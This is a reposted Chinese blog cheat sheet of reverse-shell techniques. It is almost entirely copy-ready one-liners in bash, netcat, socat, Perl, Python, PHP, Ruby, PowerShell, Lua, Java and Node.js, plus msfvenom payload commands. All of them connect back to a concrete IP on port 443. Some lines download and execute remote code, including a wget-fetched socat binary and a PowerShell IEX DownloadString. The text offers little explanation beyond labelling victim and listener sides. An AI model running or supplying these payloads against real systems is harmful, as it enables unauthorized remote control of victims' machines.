反弹shell的各种基础姿势

Victim:

bash -i >& /dev/tcp/175.11.142.54/443 0>&1

Copy

/bin/bash -i > /dev/tcp/175.11.142.54/443 0&1

Copy

exec 5<>/dev/tcp/175.11.142.54/443;cat &5 >&5; done

Copy

exec /bin/sh 0&0 2>&0

Copy

0/dev/tcp/175.11.142.54/443; sh &196 2>&196

Copy

Victim:

sh -i >& /dev/udp/175.11.142.54/443 0>&1

Copy
Listener:

nc -u -lvp 443

Copy

nc -e /bin/sh 175.11.142.54 443

Copy

nc -e /bin/bash 175.11.142.54 443

Copy

nc -c bash 175.11.142.54 443

Copy

mknod backpipe p && nc 175.11.142.54 443 0backpipe

Copy

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 175.11.142.54 443 >/tmp/f

Copy

rm -f /tmp/p; mknod /tmp/p p && nc 175.11.142.54 443 0/tmp/p 2>&1

Copy

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc 175.11.142.54 443 > f

Copy

rm -f x; mknod x p && nc 175.11.142.54 443 0x

Copy

ncat 175.11.142.54 443 -e /bin/bash

Copy

ncat --udp 175.11.142.54 443 -e /bin/bash

Copy

rm -f /tmp/p; mknod /tmp/p p && telnet 175.11.142.54 443 0/tmp/p 2>&1

Copy

telnet 175.11.142.54 443 | /bin/bash | telnet 175.11.142.54 444

Copy

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 175.11.142.54 443 > f

Copy

rm -f x; mknod x p && telnet 175.11.142.54 443 0x

Copy

Victim:

/tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:175.11.142.54:443

Copy

socat tcp-connect:175.11.142.54:443 exec:"bash -li",pty,stderr,setsid,sigint,sane

Copy
Listener:

socat file:tty,raw,echo=0 TCP-L:443

Copy
Victim:

wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:175.11.142.54:443

Copy

Victim:

perl -e 'use Socket;$i="175.11.142.54";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Copy

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"175.11.142.54:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Copy
Windows only, Victim:

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"175.11.142.54:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Copy

IP v4

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("175.11.142.54",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Copy

export RHOST="175.11.142.54";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Copy

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("175.11.142.54",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Copy IP v6

python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",443,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

Copy Windows only:

C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('175.11.142.54', 443)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Copy

php -r '$sock=fsockopen("175.11.142.54",443);exec("/bin/sh -i &3 2>&3");'

Copy

php -r '$s=fsockopen("175.11.142.54",443);$proc=proc_open("/bin/sh -i", array(0=>$s, 1=>$s, 2=>$s),$pipes);'

Copy

php -r '$s=fsockopen("175.11.142.54",443);shell_exec("/bin/sh -i &3 2>&3");'

Copy

php -r '$s=fsockopen("175.11.142.54",443);/bin/sh -i &3 2>&3;'

Copy

php -r '$s=fsockopen("175.11.142.54",443);system("/bin/sh -i &3 2>&3");'

Copy

php -r '$s=fsockopen("175.11.142.54",443);popen("/bin/sh -i &3 2>&3", "r");'

Copy

php -r '$s=\'127.0.0.1\';$p=443;@error_reporting(0);@ini_set("error_log",NULL);@ini_set("log_errors",0);@set_time_limit(0);umask(0);if($s=fsockopen($s,$p,$n,$n)){if($x=proc_open(\'/bin/sh$IFS-i\',array(array(\'pipe\',\'r\'),array(\'pipe\',\'w\'),array(\'pipe\',\'w\')),$p,getcwd())){stream_set_blocking($p[0],0);stream_set_blocking($p[1],0);stream_set_blocking($p[2],0);stream_set_blocking($s,0);while(true){if(feof($s))die(\'connection/closed\');if(feof($p[1]))die(\'shell/not/response\');$r=array($s,$p[1],$p[2]);stream_select($r,$n,$n,null);if(in_array($s,$r))fwrite($p[0],fread($s,1024));if(in_array($p[1],$r))fwrite($s,fread($p[1],1024));if(in_array($p[2],$r))fwrite($s,fread($p[2],1024));}fclose($p[0]);fclose($p[1]);fclose($p[2]);proc_close($x);}else{die("proc_open/disabled");}}else{die("not/connect");}'

Copy

ruby -rsocket -e'f=TCPSocket.open("175.11.142.54",443).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

Copy

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("175.11.142.54","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Copy
NOTE: Windows only

ruby -rsocket -e 'c=TCPSocket.new("175.11.142.54","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Copy

Attacker:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

Copy

openssl s_server -quiet -key key.pem -cert cert.pem -port 443

Copy or

ncat --ssl -vv -l -p 443

Copy Victim:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 175.11.142.54:443 > /tmp/s; rm /tmp/s

Copy

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("175.11.142.54",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Copy

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('175.11.142.54',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Copy

powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')

Copy

awk 'BEGIN {s = "/inet/tcp/0/175.11.142.54/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Copy

echo 'set s [socket 175.11.142.54 443];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

Copy

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/175.11.142.54/443;cat &5 >&5; done"] as String[])
p.waitFor()

Copy

String host="127.0.0.1";
int port=4444;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Copy

Thread thread = new Thread(){
    public void run(){
        // Reverse shell here
    }
}
thread.start();

Copy

msfvenom -p java/jsp_shell_reverse_tcp LHOST=175.11.142.54 LPORT=443 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file

Copy

Linux only

lua -e "require('socket');require('os');t=socket.tcp();t:connect('175.11.142.54','443');os.execute('/bin/sh -i &3 2>&3');"

Copy
Windows and Linux

lua5.1 -e 'local host, port = "175.11.142.54", 443 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

Copy

(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(443, "175.11.142.54", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

Copy

require('child_process').exec('nc -e /bin/sh 175.11.142.54 443')

Copy

-var x = global.process.mainModule.require
-x('child_process').exec('nc 175.11.142.54 443 -e /bin/bash')

Copy

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

Copy

String host="175.11.142.54";
int port=443;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Copy

msfvenom -p windows/meterpreter/reverse_tcp LHOST=175.11.142.54 LPORT=443 -f exe > reverse.exe

Copy

msfvenom -p windows/shell_reverse_tcp LHOST=175.11.142.54 LPORT=443 -f exe > reverse.exe

Copy

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=175.11.142.54 LPORT=443 -f elf >reverse.elf

Copy

msfvenom -p linux/x86/shell_reverse_tcp LHOST=175.11.142.54 LPORT=443 -f elf >reverse.elf

Copy

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="175.11.142.54" LPORT=443 -f elf > shell.elf

Copy

msfvenom -p windows/meterpreter/reverse_tcp LHOST="175.11.142.54" LPORT=443 -f exe > shell.exe

Copy

msfvenom -p osx/x86/shell_reverse_tcp LHOST="175.11.142.54" LPORT=443 -f macho > shell.macho

Copy

msfvenom -p windows/meterpreter/reverse_tcp LHOST="175.11.142.54" LPORT=443 -f asp > shell.asp

Copy

msfvenom -p java/jsp_shell_reverse_tcp LHOST="175.11.142.54" LPORT=443 -f raw > shell.jsp

Copy

msfvenom -p java/jsp_shell_reverse_tcp LHOST="175.11.142.54" LPORT=443 -f war > shell.war

Copy

msfvenom -p cmd/unix/reverse_python LHOST="175.11.142.54" LPORT=443 -f raw > shell.py

Copy

msfvenom -p cmd/unix/reverse_bash LHOST="175.11.142.54" LPORT=443 -f raw > shell.sh

Copy

msfvenom -p cmd/unix/reverse_perl LHOST="175.11.142.54" LPORT=443 -f raw > shell.pl

Copy

xterm -display 175.11.142.54:1
Xnest :1
xhost +targetip

Copy

Original: https://www.cnblogs.com/hookjoy/p/12799253.html
Author: Hookjoy
Title: 反弹shell的各种基础姿势

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/529743/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

  • vim分屏功能总结

    vim的分屏功能总结起来,基本都是ctrl+w然后加上某一个按键字母,触发一个功能。(1)在shell里打开几个文件并且分屏:vim -On file1 file2 ……

    Linux 2023年6月14日
    075
  • Centos7升级内核

    1、查看当前内核版本 $ uname -r 3.10.0-1160.25.1.el7.x86_64 $ uname -a Linux localhost.localdomain 3…

    Linux 2023年6月13日
    066
  • 总结

    门诊:11张 张张是主表,主表之王是患者信息住院:12张 张张由入院登记开始,外挂处方点评一张电子病历:12张 病历概要打头来,紧接门(急)病历,急诊留观放尾中,住院病历放最后检验…

    Linux 2023年6月13日
    093
  • haproxy

    haproxy 一.haproxy简介 二.负载均衡 三.haproxy安装 1.yum安装 2.源码安装 2.1 配置文件解析 2.2时间格式 2.3 全局global 2.4 …

    Linux 2023年6月7日
    076
  • muduo源码分析之muduo简单运用

    今天不先实现 muduo项目,我们先来看下 muduo库的基本使用,只有了解了如何用,才能在写代码的时候知道自己写的找个函数是干嘛的,实际上是怎么使用的这个函数。首先说简单点,就是…

    Linux 2023年6月13日
    072
  • 数据库性能优化八大方案,你知道几个

    前言 毫不夸张的说咱们后端工程师,无论在哪家公司,呆在哪个团队,做哪个系统,遇到的第一个让人头疼的问题绝对是数据库性能问题。 如果我们有一套成熟的方法论,能让大家快速、准确的去选择…

    Linux 2023年6月13日
    063
  • Ubuntu16.04修改IP

    ssh登录到服务。编辑网卡配置文件。 vim /etc/network/interfaces 先关闭DPCP,将 iface eth0 inet dhcp前面加上#号。 设置IP地…

    Linux 2023年6月6日
    086
  • 以Docker方式安装Redis集群

    以 Redis-6.0.6 为例,先从仓库将镜像拉下来: docker pull redis:6.0.6 Redis 的配置文件和数据文件不能放在镜像中,这里选择容器中的目录和宿主…

    Linux 2023年5月28日
    053
  • 微服务架构项目搭建过程中的Mysql安装和相关问题

    搭建微服务架构的过程中需要使用Mysql数据库,Mysql数据库搭建着实不是一个容易的事情,会碰到各种各样的问题,如果没有一个安装数据库的思路真的很难把数据库安装好,并且掉入到安装…

    Linux 2023年6月14日
    095
  • 门罗币XMR最新挖矿算法RandomX设计原理

    Randomx算法-门罗币XMR的挖矿新算法 RandomX算法设计目标是抗ASIC+降低GPU优势。 Monero门罗币XMR计划于2019年的10月份启用最新的RandomX …

    Linux 2023年6月6日
    091
  • Git详细使用流程

    初始化git仓库 git init 执行命令后文件夹下将会在执行命令路径下生成.git隐藏文件上传该路径下的所有内容到暂存区 git add . 通常项目中都有read.me,创建…

    Linux 2023年6月7日
    089
  • 011 Linux 打包与解压 tar

    01 压缩、打包命令有哪些? Linux上有着各种压缩、打包的工具:tar、gzip、zip、7z,而 tar 应该算是 Linux 官宣的压缩工具了。tar 的核心压缩工具其实是…

    Linux 2023年5月27日
    063
  • map_set使用说明

    map_set使用说明 map的底层结构大致是一个哈希表,set的底层结构大致是一个红黑树 不代表全部! set #include"map_set.h" //s…

    Linux 2023年6月13日
    080
  • 我叫Mongo,收了「查询基础篇」,值得你拥有

    这是mongo第二篇「查询基础篇」,后续会连续更新6篇 mongodb的文章总结上会有一系列的文章,顺序是先学会怎么用,在学会怎么用好,戒急戒躁,循序渐进,跟着我一起来探索交流。 …

    Linux 2023年6月14日
    099
  • Android进阶技术之——一文吃透Android的消息机制

    前言 为什么要老药换新汤 作为Android中 至关重要 的机制之一,十多年来,分析它的文章不断,大量的内容已经被挖掘过了。所以: 已经对这一机制熟稔于心的读者,在这篇文章中,看不…

    Linux 2023年6月13日
    093
  • 面试题:海量数据处理利器-布隆过滤器

    概念 原理 布隆过滤器的使用场景 简单模拟布隆过滤器 Guava布隆过滤器 Redis布隆过滤器 布谷鸟过滤器 作者:小牛呼噜噜 | https://xiaoniuhululu.c…

    Linux 2023年6月6日
    0124
亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球